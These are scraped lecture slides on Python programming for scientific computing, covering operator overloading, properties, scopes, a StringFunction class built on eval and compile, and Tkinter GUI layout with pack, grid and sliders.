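        return isinstance(other, Vec2) and (self.x, self.y) == (other.x, other.y)

u = Vec2(1, 2)
v = u + Vec2(3, 4)    # Vec2.__add__
w = u + 10            # Vec2.__add__ with a number
r = 10 + u            # falls back to Vec2.__radd__
```

Without __radd__, the expression 10 + u would raise a TypeError.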

![]() | __int__(self): conversion to integer (int(a) makes an a.__int__() call) |
![]() | __float__(self): conversion to float |
![]() | __hex__(self): conversion to hexadecimal number |

![]() | if a: when is a evaluated as true? |
![]() | If a has __len__ or __nonzero__ and the return value is 0 or False, a evaluates to false |
![]() | Otherwise: a evaluates to true |
![]() | Implication: no implementation of __len__ or __nonzero__ implies that a evaluates to true!! |
![]() | while a follows (naturally) the same set-up |

![]() | Matlab has a nice feature: mathematical formulas, written as text, can be turned into callable functions |
![]() | A similar feature in Python would be like
f = StringFunction_v1('1+sin(2*x)')
print f(1.2) # evaluates f(x) for x=1.2
|
![]() | f(x) implies f.__call__(x) |
![]() | Implementation of class StringFunction_v1 is compact! (see next slide) |

![]() | Simple implementation:
class StringFunction_v1:
    def __init__(self, expression):
        self._f = expression
    def __call__(self, x):
        return eval(self._f)  # evaluate function expression
|
![]() | Problem: eval(string) is slow; should pre-compile expression
class StringFunction_v2:
    def __init__(self, expression):
        self._f_compiled = compile(expression,
                                   '<string>', 'eval')
    def __call__(self, x):
        return eval(self._f_compiled)
|
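The effect of pre-compilation can be measured with timeit. The sketch below is in Python 3 syntax and, as an assumption of this example, passes explicit namespaces to eval instead of relying on the caller's scope; the class names are hypothetical stand-ins for the v1 and v2 classes.

```python
import math
import timeit

class StringFunctionPlain:
    """Parses the expression string again on every call."""
    def __init__(self, expression):
        self._f = expression
    def __call__(self, x):
        return eval(self._f, {'sin': math.sin}, {'x': x})

class StringFunctionCompiled:
    """Parses once in the constructor and evaluates the code object."""
    def __init__(self, expression):
        self._f_compiled = compile(expression, '<string>', 'eval')
    def __call__(self, x):
        return eval(self._f_compiled, {'sin': math.sin}, {'x': x})

f_plain = StringFunctionPlain('1+sin(2*x)')
f_compiled = StringFunctionCompiled('1+sin(2*x)')
t_plain = timeit.timeit(lambda: f_plain(1.2), number=20000)
t_compiled = timeit.timeit(lambda: f_compiled(1.2), number=20000)
print('plain: %.3f s, compiled: %.3f s' % (t_plain, t_compiled))
```

The actual timings depend on the machine and the Python version, so no numbers are quoted here.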

![]() | The class concept was redesigned in Python v2.2 |
![]() | We have new-style (v2.2) and classic classes |
![]() | New-style classes add some convenient functionality to classic classes |
![]() | New-style classes must be derived from the object base class:
class MyBase(object):
# the rest of MyBase is as before
|

![]() | Static data (or class variables) are common to all instances
>>> class Point:
        counter = 0 # static variable, counts no of instances
        def __init__(self, x, y):
            self.x = x; self.y = y;
            Point.counter += 1
>>> for i in range(1000):
        p = Point(i*0.01, i*0.001)
>>> Point.counter # access without instance
1000
>>> p.counter # access through instance
1000
|

![]() | New-style classes allow static methods (methods that can be called without having an instance)
class Point(object):
    _counter = 0
    def __init__(self, x, y):
        self.x = x; self.y = y; Point._counter += 1
    def ncopies(): return Point._counter
    ncopies = staticmethod(ncopies)
|
![]() | Calls:
>>> Point.ncopies()
0
>>> p = Point(0, 0)
>>> p.ncopies()
1
>>> Point.ncopies()
1
|
![]() | A static method receives neither self nor the class as argument; class attributes must be accessed explicitly through the class name (as in Point._counter) |
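From Python 2.4 the same static method can be written with decorator syntax. The sketch below (Python 3 syntax) also shows a class method as an alternative that receives the class as its first argument; the method name ncopies_cls is hypothetical.

```python
class Point(object):
    _counter = 0

    def __init__(self, x, y):
        self.x = x; self.y = y
        Point._counter += 1

    @staticmethod
    def ncopies():
        # no self and no class argument: use the class name explicitly
        return Point._counter

    @classmethod
    def ncopies_cls(cls):
        # cls is the class the method was called on
        return cls._counter

p = Point(0, 0)
print(Point.ncopies(), p.ncopies(), Point.ncopies_cls())
```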

![]() | Python 2.2 introduced ``intelligent'' assignment operators, known as properties |
![]() | That is, assignment may imply a function call:
x.data = mydata; yourdata = x.data
# can be made equivalent to
x.set_data(mydata); yourdata = x.get_data()
|
![]() | Construction:
class MyClass(object): # new-style class required!
    ...
    def set_data(self, d):
        self._data = d
        <update other data structures if necessary...>
    def get_data(self):
        <perform actions if necessary...>
        return self._data
    data = property(fget=get_data, fset=set_data)
|
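A runnable sketch of the construction, in Python 3 syntax. The class Sample and its mean attribute are hypothetical; they illustrate one possible "update other data structures" step and a read-only property (no fset).

```python
class Sample(object):
    def __init__(self):
        self._data = []
        self._mean = None

    def get_data(self):
        return self._data

    def set_data(self, d):
        self._data = list(d)
        # keep a dependent quantity up to date on every assignment
        self._mean = sum(self._data) / float(len(self._data))

    data = property(fget=get_data, fset=set_data)
    mean = property(fget=lambda self: self._mean)  # read-only

x = Sample()
x.data = [1, 2, 3, 6]      # calls x.set_data([1, 2, 3, 6])
print(x.data, x.mean)      # calls x.get_data() and the mean getter
```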

Direct access:
my_object.attr1 = True
a = my_object.attr1
| |
get/set functions:
class A:
    def set_attr1(self, attr1):
        self._attr1 = attr1 # underscore => non-public variable
        self._update(self._attr1) # update internal data too
    ...
my_object.set_attr1(True)
a = my_object.get_attr1()
Tedious to write! Properties are simpler...
|

| Use direct access if user is allowed to read and assign values to the attribute | |
| Use properties to restrict access, with a corresponding underlying non-public class attribute | |
| Use properties when assignment or reading requires a set of associated operations | |
Never use get/set functions explicitly
myobj.compute_something()
myobj.my_special_variable = yourobj.find_values(x,y)
|

![]() | Example: a is global, local, and class attribute
a = 1 # global variable
def f(x):
    a = 2 # local variable
class B:
    def __init__(self):
        self.a = 3 # class attribute
    def scopes(self):
        a = 4 # local (method) variable
|
![]() | Dictionaries with variable names as keys and variables as values:
locals() : local variables
globals() : global variables
vars() : local variables
vars(self) : class attributes
|

![]() | Function scope:
>>> a = 1
>>> def f(x):
        a = 2 # local variable
        print 'locals:', locals(), 'local a:', a
        print 'global a:', globals()['a']
>>> f(10)
locals: {'a': 2, 'x': 10} local a: 2
global a: 1
a refers to local variable
|

![]() | Class:
class B:
    def __init__(self):
        self.a = 3 # class attribute
    def scopes(self):
        a = 4 # local (method) variable
        print 'locals:', locals()
        print 'vars(self):', vars(self)
        print 'self.a:', self.a
        print 'local a:', a, 'global a:', globals()['a']
|
![]() | Interactive test:
>>> b=B()
>>> b.scopes()
locals: {'a': 4, 'self': <scope.B instance at 0x4076fb4c>}
vars(self): {'a': 3}
self.a: 3
local a: 4 global a: 1
|

![]() | Variable interpolation with vars:
class C(B):
    def write(self):
        local_var = -1
        s = '%(local_var)d %(global_var)d %(a)s' % vars()
|
![]() | Problem: vars() returns dict with local variables and the string needs global, local, and class variables |
![]() | Primary solution: use printf-like formatting:
s = '%d %d %d' % (local_var, global_var, self.a) |
![]() | More exotic solution:
all = {}
for scope in (locals(), globals(), vars(self)):
    all.update(scope)
s = '%(local_var)d %(global_var)d %(a)s' % all
(but now we overwrite a...)
|
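The merged-dictionary idea can be run as follows (Python 3 syntax). The value of global_var is an assumption made for this illustration. The order of the scopes decides which variable wins on a name clash, since later updates overwrite earlier ones.

```python
global_var = 10   # hypothetical global used only for this illustration

class B:
    def __init__(self):
        self.a = 3

class C(B):
    def write(self):
        local_var = -1
        names = {}
        # later updates win: attributes of self override locals,
        # which in turn override globals
        for scope in (globals(), locals(), vars(self)):
            names.update(scope)
        return '%(local_var)d %(global_var)d %(a)s' % names

s = C().write()
print(s)
```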

![]() | exec and eval may take dictionaries for the global and local namespace:
exec code in globals, locals
eval(expr, globals, locals)
|
![]() | Example:
a = 8; b = 9
d = {'a':1, 'b':2}
eval('a + b', d) # yields 3
and
from math import *
d['b'] = pi
eval('a+sin(b)', globals(), d) # yields 1
|
![]() | Creating such dictionaries can be handy |
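A sketch of the same two evaluations with hand-made namespaces, in Python 3 syntax. Supplying only sin and pi as globals is an assumption of this example; it keeps the expression from seeing any other names in the script.

```python
import math

namespace = {'sin': math.sin, 'pi': math.pi}  # names the expression may use
params = {'a': 1, 'b': 2}

r1 = eval('a + b', namespace, params)         # a and b are taken from params
params['b'] = math.pi
r2 = eval('a + sin(b)', namespace, params)    # close to 1, up to round-off
print(r1, r2)
```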

![]() | Recall the StringFunction-classes for turning string formulas
into callable objects
f = StringFunction('1+sin(2*x)')
print f(1.2)
| ||||
![]() | We would like:
f = StringFunction_v3('1+A*sin(w*t)',
independent_variable='t',
set_parameters='A=0.1; w=3.14159')
print f(1.2)
f.set_parameters('A=0.2; w=3.14159')
print f(1.2)
|

| Idea: hold independent variable and ``set parameters'' code as strings | |
Exec these strings (to bring the variables into play) right before
the formula is evaluated
class StringFunction_v3:
    def __init__(self, expression, independent_variable='x',
                 set_parameters=''):
        self._f_compiled = compile(expression,
                                   '<string>', 'eval')
        self._var = independent_variable # 'x', 't' etc.
        self._code = set_parameters
    def set_parameters(self, code):
        self._code = code
    def __call__(self, x):
        exec '%s = %g' % (self._var, x) # assign indep. var.
        if self._code: exec(self._code) # parameters?
        return eval(self._f_compiled)
|

| The exec used in the __call__ method is slow! | |
Think of a hardcoded function,
def f1(x):
    return sin(x) + x**3 + 2*x
and the corresponding StringFunction-like objects
| |
Efficiency test (time units to the right):
f1               : 1
StringFunction_v1: 13
StringFunction_v2: 2.3
StringFunction_v3: 22
Why?
| |
| eval w/compile is important; exec is very slow |

| Ideas: hold parameters in a dictionary, set the independent variable into this dictionary, run eval with this dictionary as local namespace | |
Usage:
f = StringFunction_v4('1+A*sin(w*t)', independent_variable='t',
                      A=0.1, w=3.14159)
f.set_parameters(A=2) # can be done later
|

Code:
class StringFunction_v4:
    def __init__(self, expression, **kwargs):
        self._f_compiled = compile(expression,
                                   '<string>', 'eval')
        self._var = kwargs.get('independent_variable', 'x')
        self._prms = kwargs
        try: del self._prms['independent_variable']
        except: pass
    def set_parameters(self, **kwargs):
        self._prms.update(kwargs)
    def __call__(self, x):
        self._prms[self._var] = x
        return eval(self._f_compiled, globals(), self._prms)
|
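For experimentation, here is a Python 3 rendering of the same idea. Two details are assumptions of this sketch rather than the course code: the global namespace is a copy of the math module's names (instead of globals()), and kwargs.pop replaces the try/del pair.

```python
import math

class StringFunction_v4:
    def __init__(self, expression, **kwargs):
        self._f_compiled = compile(expression, '<string>', 'eval')
        self._var = kwargs.pop('independent_variable', 'x')
        self._prms = kwargs                  # parameters by name
        self._globals = vars(math).copy()    # assumption: math names only

    def set_parameters(self, **kwargs):
        self._prms.update(kwargs)

    def __call__(self, x):
        self._prms[self._var] = x            # independent variable
        return eval(self._f_compiled, self._globals, self._prms)

f = StringFunction_v4('1+A*sin(w*t)', independent_variable='t',
                      A=0.1, w=3.14159)
y1 = f(1.2)
f.set_parameters(A=2)    # can be done later
y2 = f(1.2)
print(y1, y2)
```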

We would like arbitrary functions of arbitrary parameters and
independent variables:
f = StringFunction_v5('A*sin(x)*exp(-b*t)', A=0.1, b=1,
independent_variables=('x','t'))
print f(1.5, 0.01) # x=1.5, t=0.01
| |
Idea: add functionality in subclass
class StringFunction_v5(StringFunction_v4):
    def __init__(self, expression, **kwargs):
        StringFunction_v4.__init__(self, expression, **kwargs)
        self._var = tuple(kwargs.get('independent_variables',
                                     'x'))
        try: del self._prms['independent_variables']
        except: pass
    def __call__(self, *args):
        for name, value in zip(self._var, args):
            self._prms[name] = value # add indep. variable
        return eval(self._f_compiled,
                    globals(), self._prms)
|

Test function: sin(x) + x**3 + 2*x
f1               : 1
StringFunction_v1: 13  (because of uncompiled eval)
StringFunction_v2: 2.3
StringFunction_v3: 22  (because of exec in __call__)
StringFunction_v4: 2.3
StringFunction_v5: 3.1 (because of loop in __call__)
|

Instead of eval in __call__ we may build a
(lambda) function
class StringFunction:
    def _build_lambda(self):
        s = 'lambda ' + ', '.join(self._var)
        # add parameters as keyword arguments:
        if self._prms:
            s += ', ' + ', '.join(['%s=%s' % (k, self._prms[k]) \
                                   for k in self._prms])
        s += ': ' + self._f
        self.__call__ = eval(s, self._globals)
| |
For a call
f = StringFunction('A*sin(x)*exp(-b*t)', A=0.1, b=1,
                   independent_variables=('x','t'))
the s looks like
lambda x, t, A=0.1, b=1: A*sin(x)*exp(-b*t) |
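The string-building step can be tried in isolation. The helper build_lambda below is a hypothetical stand-alone function (Python 3 syntax), not the method of the StringFunction class; sorting the parameters and evaluating in a copy of the math namespace are choices made for this sketch.

```python
import math

def build_lambda(expression, independent_variables, **parameters):
    """Return (source, function) for a formula given as a string."""
    args = ', '.join(independent_variables)
    if parameters:
        # parameters become keyword arguments with default values
        args += ', ' + ', '.join('%s=%r' % (k, v)
                                 for k, v in sorted(parameters.items()))
    source = 'lambda %s: %s' % (args, expression)
    return source, eval(source, vars(math).copy())

source, f = build_lambda('A*sin(x)*exp(-b*t)', ('x', 't'), A=0.1, b=1)
print(source)
print(f(1.5, 0.01), f(1.5, 0.01, A=2))   # parameters can be overridden
```

Because the parameters are ordinary keyword arguments of the lambda, a call such as f(1.5, 0.01, A=2) overrides a parameter for that call only.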

StringFunction objects are as efficient as similar hardcoded
objects, i.e.,
class F:
    def __call__(self, x, y):
        return sin(x)*cos(y)
but there is some overhead associated with the __call__ op.
| |
Trick: extract the underlying method and call it directly
f1 = F()
f2 = f1.__call__
# f2(x,y) is faster than f1(x,y)
Can typically reduce CPU time from 1.3 to 1.0
| |
| Conclusion: now we can grab formulas from the command line, a GUI, or the Web and turn them into callable Python functions without any overhead |

![]() | ``Pretty print'':
class StringFunction:
    ...
    def __str__(self):
        return self._f # just the string formula
|
![]() | Reconstruction: a = eval(repr(a))
# StringFunction('1+x+a*y',
#                independent_variables=('x','y'),
#                a=1)
def __repr__(self):
    kwargs = ', '.join(['%s=%s' % (key, repr(value)) \
                        for key, value in self._prms.items()])
    return "StringFunction(%s, independent_variables=%s" \
           ", %s)" % (repr(self._f), repr(self._var), kwargs)
|

>>> from py4cs.StringFunction import StringFunction
>>> f = StringFunction('1+sin(2*x)')
>>> f(1.2)
1.6754631805511511
>>> f = StringFunction('1+sin(2*t)', independent_variables='t')
>>> f(1.2)
1.6754631805511511
>>> f = StringFunction('1+A*sin(w*t)', independent_variables='t', \
A=0.1, w=3.14159)
>>> f(1.2)
0.94122173238695939
>>> f.set_parameters(A=1, w=1)
>>> f(1.2)
1.9320390859672263
>>> f(1.2, A=2, w=1) # can also set parameters in the call
2.8640781719344526

>>> # function of two variables:
>>> f = StringFunction('1+sin(2*x)*cos(y)', \
independent_variables=('x','y'))
>>> f(1.2,-1.1)
1.3063874788637866
>>> f = StringFunction('1+V*sin(w*x)*exp(-b*t)', \
independent_variables=('x','t'))
>>> f.set_parameters(V=0.1, w=1, b=0.1)
>>> f(1.0,0.1)
1.0833098208613807
>>> str(f) # print formula with parameters substituted by values
'1+0.1*sin(1*x)*exp(-0.1*t)'
>>> repr(f)
"StringFunction('1+V*sin(w*x)*exp(-b*t)',
independent_variables=('x', 't'), b=0.10000000000000001,
w=1, V=0.10000000000000001)"
>>> # vector field of x and y:
>>> f = StringFunction('[a+b*x,y]', \
independent_variables=('x','y'))
>>> f.set_parameters(a=1, b=2)
>>> f(2,1) # [1+2*2, 1]
[5, 1]

![]() | Implement a class for vectors in 3D |
![]() | Application example:
>>> from Vec3D import Vec3D
>>> u = Vec3D(1, 0, 0) # (1,0,0) vector
>>> v = Vec3D(0, 1, 0)
>>> print u**v # cross product
(0, 0, 1)
>>> len(u) # Euclidean norm
1.0
>>> u[1] # subscripting
0
>>> v[2]=2.5 # subscripting w/assignment
>>> u+v # vector addition
(1, 1, 2.5)
>>> u-v # vector subtraction
(1, -1, -2.5)
>>> u*v # inner (scalar, dot) product
0
>>> str(u) # pretty print
'(1, 0, 0)'
>>> repr(u) # u = eval(repr(u))
'Vec3D(1, 0, 0)'
|

![]() | Make the arithmetic operators +, - and *
more intelligent:
u = Vec3D(1, 0, 0)
v = Vec3D(0, -0.2, 8)
a = 1.2
u+v # vector addition
a+v # scalar plus vector, yields (1.2, 1, 9.2)
v+a # vector plus scalar, yields (1.2, 1, 9.2)
a-v # scalar minus vector
v-a # vector minus scalar
a*v # scalar times vector
v*a # vector times scalar
|


![]() | Introductory GUI programming |
![]() | Scientific Hello World examples |
![]() | GUI for simviz1.py |
![]() | GUI elements: text, input text, buttons, sliders, frames (for controlling layout) |

![]() | Tk (Tkinter) |
![]() | Qt (PyQt) |
![]() | wxWindows (wxPython) |
![]() | Gtk (PyGtk) |
![]() | Java Foundation Classes (JFC) (java.swing in Jython) |
![]() | Microsoft Foundation Classes (PythonWin) |

![]() | Tkinter has been the default Python GUI toolkit |
![]() | Most Python installations support Tkinter |
![]() | PyGtk, PyQt and wxPython are increasingly popular and more sophisticated toolkits |
![]() | These toolkits require huge C/C++ libraries (Gtk, Qt, wxWindows) to be installed on the user's machine |
![]() | Some prefer to generate GUIs using an interactive designer tool, which automatically generates calls to the GUI toolkit |
![]() | Some prefer to program the GUI code (or automate that process) |
![]() | It is very wise (and necessary) to learn some GUI programming even if you end up using a designer tool |
![]() | We treat Tkinter (with extensions) here since it is so widely available and simpler to use than its competitors |
![]() | See doc.html for links to literature on PyGtk, PyQt, wxPython and associated designer tools |

![]() | Ch. 6 in the course book |
![]() | ``Introduction to Tkinter'' by Lundh (see doc.html) |
![]() | Efficient working style: grab GUI code from examples |
![]() | Demo programs:
$PYTHONSRC/Demo/tkinter
demos/All.py in the Pmw source tree
$scripting/src/gui/demoGUI.py
|

![]() | Tkinter is an interface to the Tk package in C (for Tcl/Tk) |
![]() | Megawidgets, built from basic Tkinter widgets, are available in Pmw (Python megawidgets) and Tix |
![]() | Pmw is written in Python |
![]() | Tix is written in C (and as Tk, aimed at Tcl users) |
![]() | GUI programming becomes simpler and more modular by using classes; Python supports this programming style |


![]() | Graphical user interface (GUI) for computing the sine of numbers | ||||||||
![]() | The complete window is made of widgets (also referred to as windows) | ||||||||
![]() | Widgets from left to right:
|


#!/usr/bin/env python
from Tkinter import *
import math
root = Tk() # root (main) window
top = Frame(root) # create frame (good habit)
top.pack(side='top') # pack frame in main window
hwtext = Label(top, text='Hello, World! The sine of')
hwtext.pack(side='left')
r = StringVar() # special variable to be attached to widgets
r.set('1.2') # default value
r_entry = Entry(top, width=6, relief='sunken', textvariable=r)
r_entry.pack(side='left')

s = StringVar() # variable to be attached to widgets
def comp_s():
    global s
    s.set('%g' % math.sin(float(r.get()))) # construct string
compute = Button(top, text=' equals ', command=comp_s)
compute.pack(side='left')
s_label = Label(top, textvariable=s, width=18)
s_label.pack(side='left')
root.mainloop()

![]() | A widget has a parent widget |
![]() | A widget must be packed (placed in the parent widget) before it can appear visually |
![]() | Typical structure:
widget = Tk_class(parent_widget,
arg1=value1, arg2=value2)
widget.pack(side='left')
|
![]() | Variables can be tied to the contents of, e.g., text entries, but only special Tkinter variables are legal: StringVar, DoubleVar, IntVar |

![]() | No widgets are visible before we call the event loop:
root.mainloop() |
![]() | This loop waits for user input (e.g. mouse clicks) |
![]() | There is no predefined program flow after the event loop is invoked; the program just responds to events |
![]() | The widgets define the event responses |


![]() | Instead of clicking "equals", pressing return in the entry window computes the sine value
# bind a Return in the .r entry to calling comp_s:
r_entry.bind('<Return>', comp_s)
# (comp_s must now accept an event object as argument)
|
![]() | One can bind any keyboard or mouse event to user-defined functions |
![]() | We have also replaced the "equals" button by a straight label |

![]() | The pack command determines the placement of the widgets:
widget.pack(side='left')
This results in stacking widgets from left to right |


![]() | Packing from top to bottom:
widget.pack(side='top')
|
![]() | Values of side: left, right, top, bottom |


![]() | Frame: empty widget holding other widgets (used to group widgets) |
![]() | Make 3 frames, packed from top |
![]() | Each frame holds a row of widgets |
![]() | Middle frame: 4 widgets packed from left |

# create frame to hold the middle row of widgets:
rframe = Frame(top)
# this frame (row) is packed from top to bottom:
rframe.pack(side='top')
# create label and entry in the frame and pack from left:
r_label = Label(rframe, text='The sine of')
r_label.pack(side='left')
r = StringVar() # variable to be attached to widgets
r.set('1.2') # default value
r_entry = Entry(rframe, width=6, relief='sunken', textvariable=r)
r_entry.pack(side='left')


# platform-independent font name:
font = 'times 18 bold'
# or X11-style:
font = '-adobe-times-bold-r-normal-*-18-*-*-*-*-*-*-*'
hwtext = Label(hwframe, text='Hello, World!',
font=font)


padx and pady add space around widgets:
hwtext.pack(side='top', pady=20)
rframe.pack(side='top', padx=10, pady=20)


quit_button = Button(top,
text='Goodbye, GUI World!',
command=quit,
background='yellow',
foreground='blue')
quit_button.pack(side='top', pady=5, fill='x')
# fill='x' expands the widget throughout the available
# space in the horizontal direction


![]() | The anchor option can move widgets:
quit_button.pack(anchor='w')
# or 'center', 'nw', 's' and so on
# default: 'center'
|
![]() | ipadx/ipady: more space inside the widget
quit_button.pack(side='top', pady=5,
ipadx=30, ipady=30, anchor='w')
|

$scripting/src/tools/packdemo.tcl


![]() | Alternative to pack: grid |
![]() | Widgets are organized in m times n cells, like a spreadsheet |
![]() | Widget placement:
widget.grid(row=1, column=5) |
![]() | A widget can span more than one cell
widget.grid(row=1, column=2, columnspan=4) |

![]() | Padding as with pack (padx, ipadx etc.) |
![]() | sticky replaces anchor and fill |


# use grid to place widgets in 3x4 cells:
hwtext.grid(row=0, column=0, columnspan=4, pady=20)
r_label.grid(row=1, column=0)
r_entry.grid(row=1, column=1)
compute.grid(row=1, column=2)
s_label.grid(row=1, column=3)
quit_button.grid(row=2, column=0, columnspan=4, pady=5,
sticky='ew')

![]() | sticky='w' means anchor='w' (move to west) |
![]() | sticky='ew' means fill='x' (move to east and west) |
![]() | sticky='news' means fill='both' (expand in all dirs) |

![]() | So far: variables tied to text entry and result label | ||||
![]() | Another method:
| ||||
![]() | Can use configure to update any widget property |


![]() | No variable is tied to the entry:
r_entry = Entry(rframe, width=6, relief='sunken')
r_entry.insert('end','1.2') # insert default value
r = float(r_entry.get())
s = math.sin(r)
s_label.configure(text=str(s))
|
![]() | Other properties can be configured:
s_label.configure(background='yellow') |

![]() | With the basic knowledge of GUI programming, you may try out a designer tool for interactive automatic generation of a GUI |
![]() | Glade: designer tool for PyGtk |
![]() | Gtk, PyGtk and Glade must be installed (not part of Python!) |
![]() | See doc.html for introductions to Glade |
![]() | Working style: pick a widget, place it in the GUI window, open a properties dialog, set packing parameters, set callbacks (signals in PyGtk), etc. |
![]() | Glade stores the GUI in an XML file |
![]() | The GUI is hence separate from the application code |

![]() | GUIs are conveniently implemented as classes |
![]() | Classes in Python are similar to classes in Java and C++ |
![]() | Constructor: create and pack all widgets |
![]() | Methods: called by buttons, events, etc. |
![]() | Attributes: hold widgets, widget variables, etc. |
![]() | The class instance can be used as an encapsulated GUI component in other GUIs (like a megawidget) |

![]() | Declare a base class MyBase:
class MyBase:
    def __init__(self,i,j): # constructor
        self.i = i; self.j = j
    def write(self): # member function
        print 'MyBase: i=',self.i,'j=',self.j
|
![]() | self is a reference to this object |
![]() | Data members are prefixed by self: self.i, self.j |
![]() | All functions take self as first argument in the
declaration, but not in the call
inst1 = MyBase(6,9); inst1.write() |

![]() | Class MySub is a subclass of MyBase:
class MySub(MyBase):
    def __init__(self,i,j,k): # constructor
        MyBase.__init__(self,i,j)
        self.k = k;
    def write(self):
        print 'MySub: i=',self.i,'j=',self.j,'k=',self.k
|
![]() | Example:
# this function works with any object that has a write method:
def write(v):
    v.write()
# make a MySub instance
inst2 = MySub(7,8,9)
write(inst2) # will call MySub's write
|
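The remark "any object that has a write method" also covers classes outside the MyBase hierarchy. A sketch in Python 3 syntax, where the class Note is a hypothetical unrelated class added for illustration:

```python
class MyBase:
    def __init__(self, i, j):
        self.i = i; self.j = j
    def write(self):
        print('MyBase: i=%s j=%s' % (self.i, self.j))

class MySub(MyBase):
    def __init__(self, i, j, k):
        MyBase.__init__(self, i, j)
        self.k = k
    def write(self):
        print('MySub: i=%s j=%s k=%s' % (self.i, self.j, self.k))

class Note:
    """Hypothetical class with no relation to MyBase."""
    def __init__(self, text):
        self.text = text
    def write(self):
        print('Note: ' + self.text)

def write(v):
    v.write()   # only requires that v has a write method

for obj in (MyBase(6, 9), MySub(7, 8, 9), Note('no common base class')):
    write(obj)
```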

class HelloWorld:
    def __init__(self, parent):
        # store parent
        # create widgets as in hwGUI9.py
    def quit(self, event=None):
        # call parent's quit, for use with binding to 'q'
        # and quit button
    def comp_s(self, event=None):
        # sine computation
root = Tk()
hello = HelloWorld(root)
root.mainloop()

class HelloWorld:
    def __init__(self, parent):
        self.parent = parent # store the parent
        top = Frame(parent) # create frame for all class widgets
        top.pack(side='top') # pack frame in parent's window
        # create frame to hold the first widget row:
        hwframe = Frame(top)
        # this frame (row) is packed from top to bottom:
        hwframe.pack(side='top')
        # create label in the frame:
        font = 'times 18 bold'
        hwtext = Label(hwframe, text='Hello, World!', font=font)
        hwtext.pack(side='top', pady=20)

        # create frame to hold the middle row of widgets:
        rframe = Frame(top)
        # this frame (row) is packed from top to bottom:
        rframe.pack(side='top', padx=10, pady=20)
        # create label and entry in the frame and pack from left:
        r_label = Label(rframe, text='The sine of')
        r_label.pack(side='left')
        self.r = StringVar() # variable to be attached to r_entry
        self.r.set('1.2') # default value
        r_entry = Entry(rframe, width=6, textvariable=self.r)
        r_entry.pack(side='left')
        r_entry.bind('<Return>', self.comp_s)
        compute = Button(rframe, text=' equals ',
                         command=self.comp_s, relief='flat')
        compute.pack(side='left')

        self.s = StringVar() # variable to be attached to s_label
        s_label = Label(rframe, textvariable=self.s, width=12)
        s_label.pack(side='left')
        # finally, make a quit button:
        quit_button = Button(top, text='Goodbye, GUI World!',
                             command=self.quit,
                             background='yellow', foreground='blue')
        quit_button.pack(side='top', pady=5, fill='x')
        self.parent.bind('<q>', self.quit)
    def quit(self, event=None):
        self.parent.quit()
    def comp_s(self, event=None):
        self.s.set('%g' % math.sin(float(self.r.get())))

![]() | Event bindings call functions that take an event object as argument:
self.parent.bind('<q>', self.quit)
def quit(self,event): # the event arg is required!
    self.parent.quit()
|
![]() | Button must call a quit function without arguments:
def quit():
    self.parent.quit()
quit_button = Button(frame, text='Goodbye, GUI World!',
                     command=quit)
|

![]() | Here is a unified quit function that can be used with buttons and event bindings:
def quit(self, event=None):
    self.parent.quit()
|
![]() | Keyword arguments and None as default value make Python programming effective! |
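The two calling conventions can be checked without opening a window. In the sketch below (Python 3 syntax), FakeParent is a hypothetical stand-in for the Tk root, and the two calls imitate how a Button command and an event binding invoke the method.

```python
class FakeParent:
    """Hypothetical stand-in for a Tk root window; counts quit calls."""
    def __init__(self):
        self.quit_calls = 0
    def quit(self):
        self.quit_calls += 1

class App:
    def __init__(self, parent):
        self.parent = parent
    def quit(self, event=None):
        # works both with and without an event argument
        self.parent.quit()

parent = FakeParent()
app = App(parent)
app.quit()           # as called by Button(..., command=app.quit)
app.quit(object())   # as called by a binding, which passes an event
print(parent.quit_calls)
```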


Label + entry + label + entry + button + label
# f_widget, x_widget are text entry widgets
f_txt = f_widget.get() # get function expression as string
x = float(x_widget.get()) # get x as float
#####
res = eval(f_txt) # turn f_txt expression into Python code
#####
label.configure(text='%g' % res) # display f(x)

![]() | eval(s) evaluates a Python expression s
eval('sin(1.2) + 3.1**8')
|
![]() | exec(s) executes the string s as Python code
s = 'x = 3; y = sin(1.2*x) + x**8'
exec(s)
|
![]() | Main application: get Python expressions from a GUI (no need to parse mathematical expressions if they follow the Python syntax!), build tailored code at run-time depending on input to the script |
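Both calls can be given an explicit namespace dictionary, which makes it easy to see what the executed code created. A sketch in Python 3 syntax; the dictionary name ns is arbitrary. Note that eval and exec run arbitrary code, so strings from untrusted users should not be passed to them.

```python
import math

ns = {'sin': math.sin}                      # names visible to the strings

value = eval('sin(1.2) + 3.1**8', ns)       # an expression yields a value
exec('x = 3; y = sin(1.2*x) + x**8', ns)    # statements store x and y in ns
print(value, ns['x'], ns['y'])
```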

![]() | Recall simviz1.py: automating simulation and visualization of an oscillating system via a simple command-line interface |
![]() | GUI interface: |


class SimVizGUI:
    def __init__(self, parent):
        """build the GUI"""
        self.parent = parent
        ...
        self.p = {} # holds all Tkinter variables
        self.p['m'] = DoubleVar(); self.p['m'].set(1.0)
        self.slider(slider_frame, self.p['m'], 0, 5, 'm')
        self.p['b'] = DoubleVar(); self.p['b'].set(0.7)
        self.slider(slider_frame, self.p['b'], 0, 2, 'b')
        self.p['c'] = DoubleVar(); self.p['c'].set(5.0)
        self.slider(slider_frame, self.p['c'], 0, 20, 'c')

    def slider(self, parent, variable, low, high, label):
        """make a slider [low,high] tied to variable"""
        widget = Scale(parent, orient='horizontal',
            from_=low, to=high, # range of slider
            # tickmarks on the slider "axis":
            tickinterval=(high-low)/5.0,
            # the steps of the counter above the slider:
            resolution=(high-low)/100.0,
            label=label, # label printed above the slider
            length=300, # length of slider in pixels
            variable=variable) # slider value is tied to variable
        widget.pack(side='top')
        return widget
    def textentry(self, parent, variable, label):
        """make a textentry field tied to variable"""
        ...

![]() | Use three frames: left, middle, right |
![]() | Place sliders in the left frame |
![]() | Place text entry fields in the middle frame |
![]() | Place a sketch of the system in the right frame |

![]() | Version 1 of creating a text field: straightforward packing of labels and entries in frames:
def textentry(self, parent, variable, label):
    """make a textentry field tied to variable"""
    f = Frame(parent)
    f.pack(side='top', padx=2, pady=2)
    l = Label(f, text=label)
    l.pack(side='left')
    widget = Entry(f, textvariable=variable, width=8)
    widget.pack(side='left', anchor='w')
    return widget
|



![]() | Use the grid geometry manager to place labels and text entry fields in a spreadsheet-like fashion:
def textentry(self, parent, variable, label):
    """make a textentry field tied to variable"""
    l = Label(parent, text=label)
    l.grid(column=0, row=self.row_counter, sticky='w')
    widget = Entry(parent, textvariable=variable, width=8)
    widget.grid(column=1, row=self.row_counter)
    self.row_counter += 1
    return widget
|
![]() | You can mix the use of grid and pack, but not within the same frame |

sketch_frame = Frame(self.parent)
sketch_frame.pack(side='left', padx=2, pady=2)
gifpic = os.path.join(os.environ['scripting'],
'src','gui','figs','simviz2.xfig.t.gif')
